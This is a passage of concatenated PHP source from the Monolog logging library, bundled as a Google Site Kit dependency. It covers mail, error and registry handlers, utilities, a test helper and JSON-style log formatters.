\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\ElasticaFormatter($this->options['index'], $this->options['type']); } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { $documents = $this->getFormatter()->formatBatch($records); $this->bulkSend($documents); } /** * Use Elasticsearch bulk API to send list of documents * * @param Document[] $documents * * @throws \RuntimeException */ protected function bulkSend(array $documents) : void { try { $this->client->addDocuments($documents); } catch (\Google\Site_Kit_Dependencies\Elastica\Exception\ExceptionInterface $e) { if (!$this->options['ignore_error']) { throw new \RuntimeException("Error sending messages to Elasticsearch", 0, $e); } } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter; use Google\Site_Kit_Dependencies\Symfony\Component\Mailer\MailerInterface; use Google\Site_Kit_Dependencies\Symfony\Component\Mailer\Transport\TransportInterface; use Google\Site_Kit_Dependencies\Symfony\Component\Mime\Email; /** * SymfonyMailerHandler uses Symfony's Mailer component to send the emails * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger */ class SymfonyMailerHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\MailHandler { /** @var MailerInterface|TransportInterface */ protected $mailer; /** @var Email|callable(string, Record[]): Email */ private $emailTemplate; /** * @psalm-param Email|callable(string, Record[]): Email $email * * @param MailerInterface|TransportInterface $mailer The mailer to use * @param callable|Email $email An email template, the subject/body will be replaced */ public function __construct($mailer, $email, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, bool $bubble = \true) { parent::__construct($level, $bubble); $this->mailer = $mailer; $this->emailTemplate = $email; } /** * {@inheritDoc} */ protected function send(string $content, array $records) : void { $this->mailer->send($this->buildMessage($content, $records)); } /** * Gets the formatter for the Swift_Message subject. * * @param string|null $format The format of the subject */ protected function getSubjectFormatter(?string $format) : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\LineFormatter($format); } /** * Creates instance of Email to be sent * * @param string $content formatted email body to be sent * @param array $records Log records that formed the content * * @phpstan-param Record[] $records */ protected function buildMessage(string $content, array $records) : \Google\Site_Kit_Dependencies\Symfony\Component\Mime\Email { $message = null; if ($this->emailTemplate instanceof \Google\Site_Kit_Dependencies\Symfony\Component\Mime\Email) { $message = clone $this->emailTemplate; } elseif (\is_callable($this->emailTemplate)) { $message = ($this->emailTemplate)($content, $records); } if (!$message instanceof \Google\Site_Kit_Dependencies\Symfony\Component\Mime\Email) { $record = \reset($records); throw new \InvalidArgumentException('Could not resolve message as instance of Email or a callable returning it' . ($record ? \Google\Site_Kit_Dependencies\Monolog\Utils::getRecordMessageForException($record) : '')); } if ($records) { $subjectFormatter = $this->getSubjectFormatter($message->getSubject()); $message->subject($subjectFormatter->format($this->getHighestRecord($records))); } if ($this->isHtmlBody($content)) { if (null !== ($charset = $message->getHtmlCharset())) { $message->html($content, $charset); } else { $message->html($content); } } else { if (null !== ($charset = $message->getTextCharset())) { $message->text($content, $charset); } else { $message->text($content); } } return $message->date(new \DateTimeImmutable()); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog; use InvalidArgumentException; /** * Monolog log registry * * Allows to get `Logger` instances in the global scope * via static method calls on this class. * * <code> * $application = new Monolog\Logger('application'); * $api = new Monolog\Logger('api'); * * Monolog\Registry::addLogger($application); * Monolog\Registry::addLogger($api); * * function testLogger() * { * Monolog\Registry::api()->error('Sent to $api Logger instance'); * Monolog\Registry::application()->error('Sent to $application Logger instance'); * } * </code> * * @author Tomas Tatarko <tomas@tatarko.sk> */ class Registry { /** * List of all loggers in the registry (by named indexes) * * @var Logger[] */ private static $loggers = []; /** * Adds new logging channel to the registry * * @param Logger $logger Instance of the logging channel * @param string|null $name Name of the logging channel ($logger->getName() by default) * @param bool $overwrite Overwrite instance in the registry if the given name already exists? * @throws \InvalidArgumentException If $overwrite set to false and named Logger instance already exists * @return void */ public static function addLogger(\Google\Site_Kit_Dependencies\Monolog\Logger $logger, ?string $name = null, bool $overwrite = \false) { $name = $name ?: $logger->getName(); if (isset(self::$loggers[$name]) && !$overwrite) { throw new \InvalidArgumentException('Logger with the given name already exists'); } self::$loggers[$name] = $logger; } /** * Checks if such logging channel exists by name or instance * * @param string|Logger $logger Name or logger instance */ public static function hasLogger($logger) : bool { if ($logger instanceof \Google\Site_Kit_Dependencies\Monolog\Logger) { $index = \array_search($logger, self::$loggers, \true); return \false !== $index; } return isset(self::$loggers[$logger]); } /** * Removes instance from registry by name or instance * * @param string|Logger $logger Name or logger instance */ public static function removeLogger($logger) : void { if ($logger instanceof \Google\Site_Kit_Dependencies\Monolog\Logger) { if (\false !== ($idx = \array_search($logger, self::$loggers, \true))) { unset(self::$loggers[$idx]); } } else { unset(self::$loggers[$logger]); } } /** * Clears the registry */ public static function clear() : void { self::$loggers = []; } /** * Gets Logger instance from the registry * * @param string $name Name of the requested Logger instance * @throws \InvalidArgumentException If named Logger instance is not in the registry */ public static function getInstance($name) : \Google\Site_Kit_Dependencies\Monolog\Logger { if (!isset(self::$loggers[$name])) { throw new \InvalidArgumentException(\sprintf('Requested "%s" logger instance is not in the registry', $name)); } return self::$loggers[$name]; } /** * Gets Logger instance from the registry via static method call * * @param string $name Name of the requested Logger instance * @param mixed[] $arguments Arguments passed to static method call * @throws \InvalidArgumentException If named Logger instance is not in the registry * @return Logger Requested instance of Logger */ public static function __callStatic($name, $arguments) { return self::getInstance($name); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog; use Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Monolog error handler * * A facility to enable logging of runtime errors, exceptions and fatal errors. * * Quick setup: <code>ErrorHandler::register($logger);</code> * * @author Jordi Boggiano <j.boggiano@seld.be> */ class ErrorHandler { /** @var LoggerInterface */ private $logger; /** @var ?callable */ private $previousExceptionHandler = null; /** @var array<class-string, LogLevel::*> an array of class name to LogLevel::* constant mapping */ private $uncaughtExceptionLevelMap = []; /** @var callable|true|null */ private $previousErrorHandler = null; /** @var array<int, LogLevel::*> an array of E_* constant to LogLevel::* constant mapping */ private $errorLevelMap = []; /** @var bool */ private $handleOnlyReportedErrors = \true; /** @var bool */ private $hasFatalErrorHandler = \false; /** @var LogLevel::* */ private $fatalLevel = \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ALERT; /** @var ?string */ private $reservedMemory = null; /** @var ?array{type: int, message: string, file: string, line: int, trace: mixed} */ private $lastFatalData = null; /** @var int[] */ private static $fatalErrors = [\E_ERROR, \E_PARSE, \E_CORE_ERROR, \E_COMPILE_ERROR, \E_USER_ERROR]; public function __construct(\Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface $logger) { $this->logger = $logger; } /** * Registers a new ErrorHandler for a given Logger * * By default it will handle errors, exceptions and fatal errors * * @param LoggerInterface $logger * @param array<int, LogLevel::*>|false $errorLevelMap an array of E_* constant to LogLevel::* constant mapping, or false to disable error handling * @param array<class-string, LogLevel::*>|false $exceptionLevelMap an array of class name to LogLevel::* constant mapping, or false to disable exception handling * @param LogLevel::*|null|false $fatalLevel a LogLevel::* constant, null to use the default LogLevel::ALERT or false to disable fatal error handling * @return ErrorHandler */ public static function register(\Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface $logger, $errorLevelMap = [], $exceptionLevelMap = [], $fatalLevel = null) : self { /** @phpstan-ignore-next-line */ $handler = new static($logger); if ($errorLevelMap !== \false) { $handler->registerErrorHandler($errorLevelMap); } if ($exceptionLevelMap !== \false) { $handler->registerExceptionHandler($exceptionLevelMap); } if ($fatalLevel !== \false) { $handler->registerFatalHandler($fatalLevel); } return $handler; } /** * @param array<class-string, LogLevel::*> $levelMap an array of class name to LogLevel::* constant mapping * @return $this */ public function registerExceptionHandler(array $levelMap = [], bool $callPrevious = \true) : self { $prev = \set_exception_handler(function (\Throwable $e) : void { $this->handleException($e); }); $this->uncaughtExceptionLevelMap = $levelMap; foreach ($this->defaultExceptionLevelMap() as $class => $level) { if (!isset($this->uncaughtExceptionLevelMap[$class])) { $this->uncaughtExceptionLevelMap[$class] = $level; } } if ($callPrevious && $prev) { $this->previousExceptionHandler = $prev; } return $this; } /** * @param array<int, LogLevel::*> $levelMap an array of E_* constant to LogLevel::* constant mapping * @return $this */ public function registerErrorHandler(array $levelMap = [], bool $callPrevious = \true, int $errorTypes = -1, bool $handleOnlyReportedErrors = \true) : self { $prev = \set_error_handler([$this, 'handleError'], $errorTypes); $this->errorLevelMap = \array_replace($this->defaultErrorLevelMap(), $levelMap); if ($callPrevious) { $this->previousErrorHandler = $prev ?: \true; } else { $this->previousErrorHandler = null; } $this->handleOnlyReportedErrors = $handleOnlyReportedErrors; return $this; } /** * @param LogLevel::*|null $level a LogLevel::* constant, null to use the default LogLevel::ALERT * @param int $reservedMemorySize Amount of KBs to reserve in memory so that it can be freed when handling fatal errors giving Monolog some room in memory to get its job done */ public function registerFatalHandler($level = null, int $reservedMemorySize = 20) : self { \register_shutdown_function([$this, 'handleFatalError']); $this->reservedMemory = \str_repeat(' ', 1024 * $reservedMemorySize); $this->fatalLevel = null === $level ? \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ALERT : $level; $this->hasFatalErrorHandler = \true; return $this; } /** * @return array<class-string, LogLevel::*> */ protected function defaultExceptionLevelMap() : array { return ['ParseError' => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL, 'Throwable' => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ERROR]; } /** * @return array<int, LogLevel::*> */ protected function defaultErrorLevelMap() : array { return [\E_ERROR => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL, \E_WARNING => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::WARNING, \E_PARSE => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ALERT, \E_NOTICE => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE, \E_CORE_ERROR => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL, \E_CORE_WARNING => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::WARNING, \E_COMPILE_ERROR => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ALERT, \E_COMPILE_WARNING => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::WARNING, \E_USER_ERROR => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ERROR, \E_USER_WARNING => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::WARNING, \E_USER_NOTICE => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE, \E_STRICT => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE, \E_RECOVERABLE_ERROR => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ERROR, \E_DEPRECATED => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE, \E_USER_DEPRECATED => \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::NOTICE]; } /** * @phpstan-return never */ private function handleException(\Throwable $e) : void { $level = \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::ERROR; foreach ($this->uncaughtExceptionLevelMap as $class => $candidate) { if ($e instanceof $class) { $level = $candidate; break; } } $this->logger->log($level, \sprintf('Uncaught Exception %s: "%s" at %s line %s', \Google\Site_Kit_Dependencies\Monolog\Utils::getClass($e), $e->getMessage(), $e->getFile(), $e->getLine()), ['exception' => $e]); if ($this->previousExceptionHandler) { ($this->previousExceptionHandler)($e); } if (!\headers_sent() && \in_array(\strtolower((string) \ini_get('display_errors')), ['0', '', 'false', 'off', 'none', 'no'], \true)) { \http_response_code(500); } exit(255); } /** * @private * * @param mixed[] $context */ public function handleError(int $code, string $message, string $file = '', int $line = 0, ?array $context = []) : bool { if ($this->handleOnlyReportedErrors && !(\error_reporting() & $code)) { return \false; } // fatal error codes are ignored if a fatal error handler is present as well to avoid duplicate log entries if (!$this->hasFatalErrorHandler || !\in_array($code, self::$fatalErrors, \true)) { $level = $this->errorLevelMap[$code] ?? \Google\Site_Kit_Dependencies\Psr\Log\LogLevel::CRITICAL; $this->logger->log($level, self::codeToString($code) . ': ' . $message, ['code' => $code, 'message' => $message, 'file' => $file, 'line' => $line]); } else { $trace = \debug_backtrace(\DEBUG_BACKTRACE_IGNORE_ARGS); \array_shift($trace); // Exclude handleError from trace $this->lastFatalData = ['type' => $code, 'message' => $message, 'file' => $file, 'line' => $line, 'trace' => $trace]; } if ($this->previousErrorHandler === \true) { return \false; } elseif ($this->previousErrorHandler) { return (bool) ($this->previousErrorHandler)($code, $message, $file, $line, $context); } return \true; } /** * @private */ public function handleFatalError() : void { $this->reservedMemory = ''; if (\is_array($this->lastFatalData)) { $lastError = $this->lastFatalData; } else { $lastError = \error_get_last(); } if ($lastError && \in_array($lastError['type'], self::$fatalErrors, \true)) { $trace = $lastError['trace'] ?? null; $this->logger->log($this->fatalLevel, 'Fatal Error (' . self::codeToString($lastError['type']) . '): ' . $lastError['message'], ['code' => $lastError['type'], 'message' => $lastError['message'], 'file' => $lastError['file'], 'line' => $lastError['line'], 'trace' => $trace]); if ($this->logger instanceof \Google\Site_Kit_Dependencies\Monolog\Logger) { foreach ($this->logger->getHandlers() as $handler) { $handler->close(); } } } } /** * @param int $code */ private static function codeToString($code) : string { switch ($code) { case \E_ERROR: return 'E_ERROR'; case \E_WARNING: return 'E_WARNING'; case \E_PARSE: return 'E_PARSE'; case \E_NOTICE: return 'E_NOTICE'; case \E_CORE_ERROR: return 'E_CORE_ERROR'; case \E_CORE_WARNING: return 'E_CORE_WARNING'; case \E_COMPILE_ERROR: return 'E_COMPILE_ERROR'; case \E_COMPILE_WARNING: return 'E_COMPILE_WARNING'; case \E_USER_ERROR: return 'E_USER_ERROR'; case \E_USER_WARNING: return 'E_USER_WARNING'; case \E_USER_NOTICE: return 'E_USER_NOTICE'; case \E_STRICT: return 'E_STRICT'; case \E_RECOVERABLE_ERROR: return 'E_RECOVERABLE_ERROR'; case \E_DEPRECATED: return 'E_DEPRECATED'; case \E_USER_DEPRECATED: return 'E_USER_DEPRECATED'; } return 'Unknown PHP error'; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog; use ArrayAccess; /** * Monolog log record interface for forward compatibility with Monolog 3.0 * * This is just present in Monolog 2.4+ to allow interoperable code to be written against * both versions by type-hinting arguments as `array|\Monolog\LogRecord $record` * * Do not rely on this interface for other purposes, and do not implement it. * * @author Jordi Boggiano <j.boggiano@seld.be> * @template-extends \ArrayAccess<'message'|'level'|'context'|'level_name'|'channel'|'datetime'|'extra'|'formatted', mixed> * @phpstan-import-type Record from Logger */ interface LogRecord extends \ArrayAccess { /** * @phpstan-return Record */ public function toArray() : array; } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog; final class Utils { const DEFAULT_JSON_FLAGS = \JSON_UNESCAPED_SLASHES | \JSON_UNESCAPED_UNICODE | \JSON_PRESERVE_ZERO_FRACTION | \JSON_INVALID_UTF8_SUBSTITUTE | \JSON_PARTIAL_OUTPUT_ON_ERROR; public static function getClass(object $object) : string { $class = \get_class($object); if (\false === ($pos = \strpos($class, "@anonymous\x00"))) { return $class; } if (\false === ($parent = \get_parent_class($class))) { return \substr($class, 0, $pos + 10); } return $parent . '@anonymous'; } public static function substr(string $string, int $start, ?int $length = null) : string { if (\extension_loaded('mbstring')) { return \mb_strcut($string, $start, $length); } return \substr($string, $start, null === $length ? \strlen($string) : $length); } /** * Makes sure if a relative path is passed in it is turned into an absolute path * * @param string $streamUrl stream URL or path without protocol */ public static function canonicalizePath(string $streamUrl) : string { $prefix = ''; if ('file://' === \substr($streamUrl, 0, 7)) { $streamUrl = \substr($streamUrl, 7); $prefix = 'file://'; } // other type of stream, not supported if (\false !== \strpos($streamUrl, '://')) { return $streamUrl; } // already absolute if (\substr($streamUrl, 0, 1) === '/' || \substr($streamUrl, 1, 1) === ':' || \substr($streamUrl, 0, 2) === '\\\\') { return $prefix . $streamUrl; } $streamUrl = \getcwd() . '/' . $streamUrl; return $prefix . $streamUrl; } /** * Return the JSON representation of a value * * @param mixed $data * @param int $encodeFlags flags to pass to json encode, defaults to DEFAULT_JSON_FLAGS * @param bool $ignoreErrors whether to ignore encoding errors or to throw on error, when ignored and the encoding fails, "null" is returned which is valid json for null * @throws \RuntimeException if encoding fails and errors are not ignored * @return string when errors are ignored and the encoding fails, "null" is returned which is valid json for null */ public static function jsonEncode($data, ?int $encodeFlags = null, bool $ignoreErrors = \false) : string { if (null === $encodeFlags) { $encodeFlags = self::DEFAULT_JSON_FLAGS; } if ($ignoreErrors) { $json = @\json_encode($data, $encodeFlags); if (\false === $json) { return 'null'; } return $json; } $json = \json_encode($data, $encodeFlags); if (\false === $json) { $json = self::handleJsonError(\json_last_error(), $data); } return $json; } /** * Handle a json_encode failure. * * If the failure is due to invalid string encoding, try to clean the * input and encode again. If the second encoding attempt fails, the * initial error is not encoding related or the input can't be cleaned then * raise a descriptive exception. * * @param int $code return code of json_last_error function * @param mixed $data data that was meant to be encoded * @param int $encodeFlags flags to pass to json encode, defaults to JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE | JSON_PRESERVE_ZERO_FRACTION * @throws \RuntimeException if failure can't be corrected * @return string JSON encoded data after error correction */ public static function handleJsonError(int $code, $data, ?int $encodeFlags = null) : string { if ($code !== \JSON_ERROR_UTF8) { self::throwEncodeError($code, $data); } if (\is_string($data)) { self::detectAndCleanUtf8($data); } elseif (\is_array($data)) { \array_walk_recursive($data, array('Monolog\\Utils', 'detectAndCleanUtf8')); } else { self::throwEncodeError($code, $data); } if (null === $encodeFlags) { $encodeFlags = self::DEFAULT_JSON_FLAGS; } $json = \json_encode($data, $encodeFlags); if ($json === \false) { self::throwEncodeError(\json_last_error(), $data); } return $json; } /** * @internal */ public static function pcreLastErrorMessage(int $code) : string { if (\PHP_VERSION_ID >= 80000) { return \preg_last_error_msg(); } $constants = \get_defined_constants(\true)['pcre']; $constants = \array_filter($constants, function ($key) { return \substr($key, -6) == '_ERROR'; }, \ARRAY_FILTER_USE_KEY); $constants = \array_flip($constants); return $constants[$code] ?? 'UNDEFINED_ERROR'; } /** * Throws an exception according to a given code with a customized message * * @param int $code return code of json_last_error function * @param mixed $data data that was meant to be encoded * @throws \RuntimeException * * @return never */ private static function throwEncodeError(int $code, $data) : void { switch ($code) { case \JSON_ERROR_DEPTH: $msg = 'Maximum stack depth exceeded'; break; case \JSON_ERROR_STATE_MISMATCH: $msg = 'Underflow or the modes mismatch'; break; case \JSON_ERROR_CTRL_CHAR: $msg = 'Unexpected control character found'; break; case \JSON_ERROR_UTF8: $msg = 'Malformed UTF-8 characters, possibly incorrectly encoded'; break; default: $msg = 'Unknown error'; } throw new \RuntimeException('JSON encoding failed: ' . $msg . '. Encoding: ' . \var_export($data, \true)); } /** * Detect invalid UTF-8 string characters and convert to valid UTF-8. * * Valid UTF-8 input will be left unmodified, but strings containing * invalid UTF-8 codepoints will be reencoded as UTF-8 with an assumed * original encoding of ISO-8859-15. This conversion may result in * incorrect output if the actual encoding was not ISO-8859-15, but it * will be clean UTF-8 output and will not rely on expensive and fragile * detection algorithms. * * Function converts the input in place in the passed variable so that it * can be used as a callback for array_walk_recursive. * * @param mixed $data Input to check and convert if needed, passed by ref */ private static function detectAndCleanUtf8(&$data) : void { if (\is_string($data) && !\preg_match('//u', $data)) { $data = \preg_replace_callback('/[\\x80-\\xFF]+/', function ($m) { return \function_exists('mb_convert_encoding') ? \mb_convert_encoding($m[0], 'UTF-8', 'ISO-8859-1') : \utf8_encode($m[0]); }, $data); if (!\is_string($data)) { $pcreErrorCode = \preg_last_error(); throw new \RuntimeException('Failed to preg_replace_callback: ' . $pcreErrorCode . ' / ' . self::pcreLastErrorMessage($pcreErrorCode)); } $data = \str_replace(['¤', '¦', '¨', '´', '¸', '¼', '½', '¾'], ['€', 'Š', 'š', 'Ž', 'ž', 'Œ', 'œ', 'Ÿ'], $data); } } /** * Converts a string with a valid 'memory_limit' format, to bytes. * * @param string|false $val * @return int|false Returns an integer representing bytes. Returns FALSE in case of error. */ public static function expandIniShorthandBytes($val) { if (!\is_string($val)) { return \false; } // support -1 if ((int) $val < 0) { return (int) $val; } if (!\preg_match('/^\\s*(?<val>\\d+)(?:\\.\\d+)?\\s*(?<unit>[gmk]?)\\s*$/i', $val, $match)) { return \false; } $val = (int) $match['val']; switch (\strtolower($match['unit'])) { case 'g': $val *= 1024; case 'm': $val *= 1024; case 'k': $val *= 1024; } return $val; } /** * @param array<mixed> $record */ public static function getRecordMessageForException(array $record) : string { $context = ''; $extra = ''; try { if ($record['context']) { $context = "\nContext: " . \json_encode($record['context']); } if ($record['extra']) { $extra = "\nExtra: " . \json_encode($record['extra']); } } catch (\Throwable $e) { // noop } return "\nThe exception occurred while attempting to log: " . $record['message'] . $context . $extra; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Test; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\DateTimeImmutable; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Lets you easily generate log records and a dummy formatter for testing purposes * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * * @internal feel free to reuse this to test your own handlers, this is marked internal to avoid issues with PHPStorm https://github.com/Seldaek/monolog/issues/1677 */ class TestCase extends \Google\Site_Kit_Dependencies\PHPUnit\Framework\TestCase { public function tearDown() : void { parent::tearDown(); if (isset($this->handler)) { unset($this->handler); } } /** * @param mixed[] $context * * @return array Record * * @phpstan-param Level $level * @phpstan-return Record */ protected function getRecord(int $level = \Google\Site_Kit_Dependencies\Monolog\Logger::WARNING, string $message = 'test', array $context = []) : array { return ['message' => (string) $message, 'context' => $context, 'level' => $level, 'level_name' => \Google\Site_Kit_Dependencies\Monolog\Logger::getLevelName($level), 'channel' => 'test', 'datetime' => new \Google\Site_Kit_Dependencies\Monolog\DateTimeImmutable(\true), 'extra' => []]; } /** * @phpstan-return Record[] */ protected function getMultipleRecords() : array { return [$this->getRecord(\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, 'debug message 1'), $this->getRecord(\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, 'debug message 2'), $this->getRecord(\Google\Site_Kit_Dependencies\Monolog\Logger::INFO, 'information'), $this->getRecord(\Google\Site_Kit_Dependencies\Monolog\Logger::WARNING, 'warning'), $this->getRecord(\Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, 'error')]; } protected function getIdentityFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { $formatter = $this->createMock(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface::class); $formatter->expects($this->any())->method('format')->will($this->returnCallback(function ($record) { return $record['message']; })); return $formatter; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog; use DateTimeZone; /** * Overrides default json encoding of date time objects * * @author Menno Holtkamp * @author Jordi Boggiano <j.boggiano@seld.be> */ class DateTimeImmutable extends \DateTimeImmutable implements \JsonSerializable { /** * @var bool */ private $useMicroseconds; public function __construct(bool $useMicroseconds, ?\DateTimeZone $timezone = null) { $this->useMicroseconds = $useMicroseconds; // if you like to use a custom time to pass to Logger::addRecord directly, // call modify() or setTimestamp() on this instance to change the date after creating it parent::__construct('now', $timezone); } public function jsonSerialize() : string { if ($this->useMicroseconds) { return $this->format('Y-m-d\\TH:i:s.uP'); } return $this->format('Y-m-d\\TH:i:sP'); } public function __toString() : string { return $this->jsonSerialize(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; /** * Encodes message information into JSON in a format compatible with Logmatic. * * @author Julien Breux <julien.breux@gmail.com> */ class LogmaticFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter { protected const MARKERS = ["sourcecode", "php"]; /** * @var string */ protected $hostname = ''; /** * @var string */ protected $appname = ''; public function setHostname(string $hostname) : self { $this->hostname = $hostname; return $this; } public function setAppname(string $appname) : self { $this->appname = $appname; return $this; } /** * Appends the 'hostname' and 'appname' parameter for indexing by Logmatic. * * @see http://doc.logmatic.io/docs/basics-to-send-data * @see \Monolog\Formatter\JsonFormatter::format() */ public function format(array $record) : string { if (!empty($this->hostname)) { $record["hostname"] = $this->hostname; } if (!empty($this->appname)) { $record["appname"] = $this->appname; } $record["@marker"] = static::MARKERS; return parent::format($record); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Class FluentdFormatter * * Serializes a log message to Fluentd unix socket protocol * * Fluentd config: * * <source> * type unix * path /var/run/td-agent/td-agent.sock * </source> * * Monolog setup: * * $logger = new Monolog\Logger('fluent.tag'); * $fluentHandler = new Monolog\Handler\SocketHandler('unix:///var/run/td-agent/td-agent.sock'); * $fluentHandler->setFormatter(new Monolog\Formatter\FluentdFormatter()); * $logger->pushHandler($fluentHandler); * * @author Andrius Putna <fordnox@gmail.com> */ class FluentdFormatter implements \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { /** * @var bool $levelTag should message level be a part of the fluentd tag */ protected $levelTag = \false; public function __construct(bool $levelTag = \false) { if (!\function_exists('json_encode')) { throw new \RuntimeException('PHP\'s json extension is required to use Monolog\'s FluentdUnixFormatter'); } $this->levelTag = $levelTag; } public function isUsingLevelsInTag() : bool { return $this->levelTag; } public function format(array $record) : string { $tag = $record['channel']; if ($this->levelTag) { $tag .= '.' . \strtolower($record['level_name']); } $message = ['message' => $record['message'], 'context' => $record['context'], 'extra' => $record['extra']]; if (!$this->levelTag) { $message['level'] = $record['level']; $message['level_name'] = $record['level_name']; } return \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode([$tag, $record['datetime']->getTimestamp(), $message]); } public function formatBatch(array $records) : string { $message = ''; foreach ($records as $record) { $message .= $this->format($record); } return $message; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Formatter; use Throwable; /** * Encodes whatever record data is passed to it as json * * This can be useful to log to databases or remote APIs * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger */ class JsonFormatter extends \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter { public const BATCH_MODE_JSON = 1; public const BATCH_MODE_NEWLINES = 2; /** @var self::BATCH_MODE_* */ protected $batchMode; /** @var bool */ protected $appendNewline; /** @var bool */ protected $ignoreEmptyContextAndExtra; /** @var bool */ protected $includeStacktraces = \false; /** * @param self::BATCH_MODE_* $batchMode */ public function __construct(int $batchMode = self::BATCH_MODE_JSON, bool $appendNewline = \true, bool $ignoreEmptyContextAndExtra = \false, bool $includeStacktraces = \false) { $this->batchMode = $batchMode; $this->appendNewline = $appendNewline; $this->ignoreEmptyContextAndExtra = $ignoreEmptyContextAndExtra; $this->includeStacktraces = $includeStacktraces; parent::__construct(); } /** * The batch mode option configures the formatting style for * multiple records. By default, multiple records will be * formatted as a JSON-encoded array. However, for * compatibility with some API endpoints, alternative styles * are available. */ public function getBatchMode() : int { return $this->batchMode; } /** * True if newlines are appended to every formatted record */ public function isAppendingNewlines() : bool { return $this->appendNewline; } /** * {@inheritDoc} */ public function format(array $record) : string { $normalized = $this->normalize($record); if (isset($normalized['context']) && $normalized['context'] === []) { if ($this->ignoreEmptyContextAndExtra) { unset($normalized['context']); } else { $normalized['context'] = new \stdClass(); } } if (isset($normalized['extra']) && $normalized['extra'] === []) { if ($this->ignoreEmptyContextAndExtra) { unset($normalized['extra']); } else { $normalized['extra'] = new \stdClass(); } } return $this->toJson($normalized, \true) . ($this->appendNewline ? "\n" : ''); } /** * {@inheritDoc} */ public function formatBatch(array $records) 